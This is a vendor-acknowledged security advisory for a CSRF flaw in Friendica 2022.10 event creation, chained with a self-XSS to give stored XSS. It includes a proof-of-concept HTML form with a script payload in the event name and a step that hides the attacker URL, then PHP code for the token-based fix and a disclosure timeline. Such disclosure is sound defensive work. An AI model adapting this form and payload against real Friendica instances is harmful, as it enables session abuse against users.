usd-2022-0049 | Friendica 2022.10 - Cross-Site Request Forgery (CSRF)

Advisory ID: usd-2022-0049
Product: Friendica
Affected Version: 2022.10
Vulnerability Type: Cross-Site Request Forgery (CSRF) (CWE-352)
Security Risk: High
Vendor URL: https://friendi.ca/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed

Description

The open source application Friendica is used to set up a decentralized social network. The focus lies on effective privacy settings and interoperability with third-party services.
A CSRF vulnerability was identified in the creation of new events in Friendica: the POST request that creates an event is not protected by an anti-CSRF token, so a third-party website can create events in a logged-in victim's calendar. Because the event name (the `summary` field) is affected by a self-XSS vulnerability, the CSRF can be used to turn that self-XSS into a stored XSS attack against the victim.

Proof of Concept

A malicious website can be created using the following snippet. When the victim, who is logged in to Friendica, visits the website and the form is submitted (an attacker would auto-submit it with JavaScript instead of relying on the button), the browser attaches the victim's session cookie to the cross-site POST and a new event containing the JavaScript payload is created in the victim's calendar:

<html>
  <body>
    <!-- Hide the attacker URL in the address bar so the victim is less likely to notice -->
    <script>history.pushState('', '', '/')</script>
    <!-- Cross-site POST to the event endpoint; the browser adds the victim's session cookie -->
    <form action="http://localhost/events" method="POST">
      <input type="hidden" name="event_id" value="0" />
      <input type="hidden" name="cid" value="0" />
      <input type="hidden" name="uri" value="http://localhost/objects/61ef0ae2-2163-6a90-40be-1a7639377312" />
      <input type="hidden" name="preview" value="0" />
      <!-- Event name: rendered without output encoding, so the payload executes in the calendar -->
      <input type="hidden" name="summary" value="&lt;img src=/X onerror=alert(document.domain)&gt;" />
      <input type="hidden" name="start_text" value="2022-11-08 18:46" />
      <input type="hidden" name="finish_text" value="2022-11-08 18:46" />
      <input type="hidden" name="nofinish" value="0" />
      <input type="hidden" name="share" value="0" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="hidden" name="desc" value="" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="visibility" value="public" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

When the victim later opens their calendar, the injected event name is rendered and the JavaScript payload executes in the context of the application, i.e. in the origin of the Friendica instance and with the victim's session.

Fix

Add CSRF tokens to all state-changing requests (requests that cause actions on the site, such as creating or editing an event) and validate them on the backend before the action is performed. The token must be unpredictable, bound to the user's session, and compared in constant time; a request without a valid token must be rejected. Independently of the CSRF fix, the event name should be output-encoded when it is displayed so that the self-XSS is removed as well.
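The following is an added example of the synchronizer-token pattern described above, written here as standalone PHP; it is not Friendica's code, and the names `form_security_token`, `csrf_secret` and `event_edit` are assumptions chosen for the illustration. A legitimate submission carries the hidden token, while the cross-site PoC from this advisory cannot obtain it and is rejected.

```php
<?php
// Added example (not Friendica's implementation): CSRF protection for a
// state-changing form such as the event form. The field name
// 'form_security_token', the session key 'csrf_secret' and the form name
// 'event_edit' are assumptions made for this illustration.
declare(strict_types=1);

// Issue a per-session secret once, then derive a token bound to the form name.
// Binding to the form name keeps a token issued for one form from being
// replayed against another endpoint.
function csrfToken(array &$session, string $formName): string
{
    if (empty($session['csrf_secret'])) {
        $session['csrf_secret'] = bin2hex(random_bytes(32));
    }
    return hash_hmac('sha256', $formName, $session['csrf_secret']);
}

// Validate the submitted token; hash_equals() gives a constant-time comparison.
function csrfValid(array $session, string $formName, ?string $submitted): bool
{
    if ($submitted === null || empty($session['csrf_secret'])) {
        return false;
    }
    $expected = hash_hmac('sha256', $formName, $session['csrf_secret']);
    return hash_equals($expected, $submitted);
}

// Render the event form with the token as a hidden field. A cross-origin
// page cannot read this response, so it cannot learn the token.
function renderEventForm(array &$session): string
{
    $token = htmlspecialchars(csrfToken($session, 'event_edit'), ENT_QUOTES, 'UTF-8');
    return '<form action="/events" method="POST">'
         . '<input type="hidden" name="form_security_token" value="' . $token . '">'
         . '<input type="text" name="summary">'
         . '<input type="submit" value="Submit">'
         . '</form>';
}

// Handle POST /events: reject the request unless the token is valid.
function handleEventPost(array $session, array $post): string
{
    if (!csrfValid($session, 'event_edit', $post['form_security_token'] ?? null)) {
        return '403 Forbidden: invalid or missing form security token';
    }
    // Output-encode the event name wherever it is displayed, so a payload in
    // the summary is rendered as text instead of being executed.
    $summary = htmlspecialchars($post['summary'] ?? '', ENT_QUOTES, 'UTF-8');
    return 'Created event: ' . $summary;
}

// Demonstration with a simulated session (constructed data, not real traffic).
$session = [];
renderEventForm($session);   // the legitimate page load issues the session secret

$legitimate = [
    'form_security_token' => csrfToken($session, 'event_edit'),
    'summary'             => 'Team meeting',
];
// The cross-site PoC form from this advisory: same fields, but no token.
$crossSite = [
    'summary' => '<img src=/X onerror=alert(document.domain)>',
];

echo handleEventPost($session, $legitimate), PHP_EOL;
echo handleEventPost($session, $crossSite), PHP_EOL;
```

Run with `php csrf_example.php`. The token only has to be unguessable and tied to the victim's session; it does not need to be a one-time nonce for this check to stop the PoC, because the attacker's page never sees the victim's rendered form. The `htmlspecialchars()` call in `handleEventPost()` addresses the self-XSS separately from the CSRF check, since the two weaknesses are independent even though the PoC chains them.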

Timeline

  • 2022-11-11: First contact request via info@friendi.ca
  • 2022-12-09: Submitted vulnerability to the vendor
  • 2022-12-20: Friendica 2022.12 released which fixes the submitted vulnerability

Credits

This security vulnerability was identified by Christian Pöschl of usd AG.